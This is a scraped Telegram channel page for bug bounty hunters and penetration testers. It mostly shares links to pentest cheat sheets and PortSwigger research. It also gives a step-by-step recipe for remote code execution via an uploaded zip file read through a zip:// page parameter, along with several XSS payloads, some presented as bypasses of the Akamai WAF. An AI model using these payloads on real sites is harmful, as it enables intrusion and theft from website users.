Web Hacking – Telegram

Web Hacking

2.08K subscribers

52 photos

6 files

38 links

@OSCP_training
@pfsense
@WifiHacking

Download Telegram

About

Blog

Apps

Platform

2.08K subscribers

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://github.com/Ignitetechnologies/BurpSuite-For-Pentester

GitHub - Ignitetechnologies/BurpSuite-For-Pentester: This cheatsheet is built for the Bug Bounty Hunters and penetration testers…

This cheatsheet is built for the Bug Bounty Hunters and penetration testers in order to help them hunt the vulnerabilities from P4 to P1 solely and completely with "BurpSuite". - ...

4.33K views17:25

Bug Bounty Hunting Tip :-

If you can upload .zip file on target then:

1. Create a .php file (rce.php)

2. Compress it to a .zip file (file.zip)

3. Upload your .zip file on the vulnerable web application.

4. Trigger your RCE via:

( https://<target Site>.com/index.php?page=zip://path/file.zip#rce.php )

30.9K views16:59

https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters

GitHub - nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters: A list of resources for those interested in getting started in bug…

A list of resources for those interested in getting started in bug bounties - nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters

6.04K views06:10

Free for only 24hrs

https://www.udemy.com/course/broad-scope-bug-bounties-from-scratch/?couponCode=9943A2D06E764688003B

5.15K views19:27

https://portswigger.net/research/new-xss-vectors

PortSwigger Research

New XSS vectors

Transition based events without style blocks So, recently, I was updating our XSS cheat sheet to fix certain vectors that had been made obsolete by browser updates. Whilst looking at the vectors, the

👍2❤1

3.35K views16:47

https://github.com/mandatoryprogrammer/xsshunter

GitHub - mandatoryprogrammer/xsshunter: The XSS Hunter service - a portable version of XSSHunter.com

The XSS Hunter service - a portable version of XSSHunter.com - mandatoryprogrammer/xsshunter

👍2

3.5K views18:27

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://medium.com/@jonathan_fulton/web-architecture-101-a3224e126947

📌Follow @oscp_training

Web Architecture 101

The basic architecture concepts I wish I knew when I was getting started as a web developer

3.14K views04:49

10.5K views19:15

@WebHacking
@WifiHacking
@OSCP_training
@PfSense

81.3K views06:23

12.6K views17:10

SSRF

13.7K views17:41

https://t.me/bug_bounty_bootcamp

4.23K views19:55

Web Hacking pinned «https://t.me/bug_bounty_bootcamp»

19:55

Akamai WAF bypass

<A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here

10.1K views15:13

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

3.23K views20:52

A nice way to store the payload

"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>

10.4K views05:10

A payload to bypass Akamai WAF

<A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here

👍4👌1

10.5K views05:39

Another one

"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>

10.8K views20:29

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning

PortSwigger Research

Making HTTP header injection critical via response queue poisoning

HTTP header injection is often under-estimated and misclassified as a moderate severity flaw equivalent to XSS or worse, Open Redirection. In this post, I'll share a simple technique I used to take a

👍2

3.07K views20:25

Forwarded from 🔥OSCP Training🔥🛡⚔️👨🏻‍💻

https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack#:~:text=specialWordlists.py.-,Command%20line%20usage,-From%20time%20to

PortSwigger Research

Turbo Intruder: Embracing the billion-request attack

Automated web application attacks are terminally limited by the number of HTTP requests they can send. It's impossible to know how many hacks have gone off the rails because you didn't quite manage to

👍1

3.21K views19:34

👍1

3.26K views19:40